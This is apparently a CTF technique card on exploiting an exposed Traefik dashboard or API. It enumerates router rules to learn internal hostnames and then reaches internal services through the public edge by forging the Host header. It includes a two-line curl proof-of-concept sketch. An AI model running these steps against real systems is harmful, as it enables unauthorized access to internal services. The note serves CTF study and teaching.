pwneglyph logo

Note

web proxy traefik host-header routing information-disclosure

Read Traefik router rules to learn internal vhost names, then route your request by sending the expected Host header.

Traefik Dashboard / API Exposure → Routing via the Host Header

The dashboard or router API reveals how virtual hosts map to internal services. Once you know the expected Host, the edge proxy routes your request for you.

Why It Works

  • Traefik routes by Host; learning the internal hostname is enough to reach the internal service through the public edge.

Vulnerable Pattern

  • Exposed Traefik API, dashboard, or debug endpoints on the same public entrypoint as the challenge.

Exploit Flow

  1. Enumerate router rules, hostnames, middlewares, and service names from the dashboard/API.
  2. Replay public requests with the recovered Host header and test alternate paths.

Variations

  • Host-based routing, path prefixes, or middleware behaviors like auth bypass on internal-only hosts.

Common Blockers

  • Dashboard read-only exposure without a useful internal hostname, or upstream still requiring another auth layer.

PoC Sketch

curl http://target/api/http/routers
curl -H 'Host: internal.service.local' http://target/

Good Situations To Use It

  • A Traefik API/dashboard is exposed.
  • Internal vhosts map to interesting services.
  • Routing is host-header driven.

Sources

  • marshack2026/web/sur_ma_route